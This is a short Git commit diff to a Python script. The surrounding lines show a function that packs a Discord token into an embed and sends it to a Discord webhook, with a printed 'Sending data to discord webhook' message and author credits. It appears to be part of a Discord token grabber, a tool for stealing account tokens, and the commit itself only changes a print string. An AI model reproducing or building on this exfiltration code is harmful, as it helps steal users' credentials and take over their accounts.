New GUI for the app

This commit is contained in:
mouadessalim
2022-08-25 18:32:56 +01:00
committed by GitHub
parent 39726615db
commit 780e6bd666

View File

@@ -116,7 +116,7 @@ def main(webhook_url) -> None:
embed.add_embed_field(name='Token', value=f"```yaml\n{token}\n```", inline=False) embed.add_embed_field(name='Token', value=f"```yaml\n{token}\n```", inline=False)
webhook.add_embed(embed) webhook.add_embed(embed)
embed.set_footer(text='By Luci (9P9), Lemon.-_-.#3714, the-cult-of-integral and mte0', inline=False) embed.set_footer(text='By Luci (9P9), Lemon.-_-.#3714, the-cult-of-integral and mte0', inline=False)
Write.Print("[!]Sending data to discord webhook...", Colors.red_to_purple) Write.Print("\n[!]Sending data to discord webhook...", Colors.red_to_purple)
webhook.execute() webhook.execute()
Write.Input('\n\nPress any button to quit.', Colors.blue_to_green) Write.Input('\n\nPress any button to quit.', Colors.blue_to_green)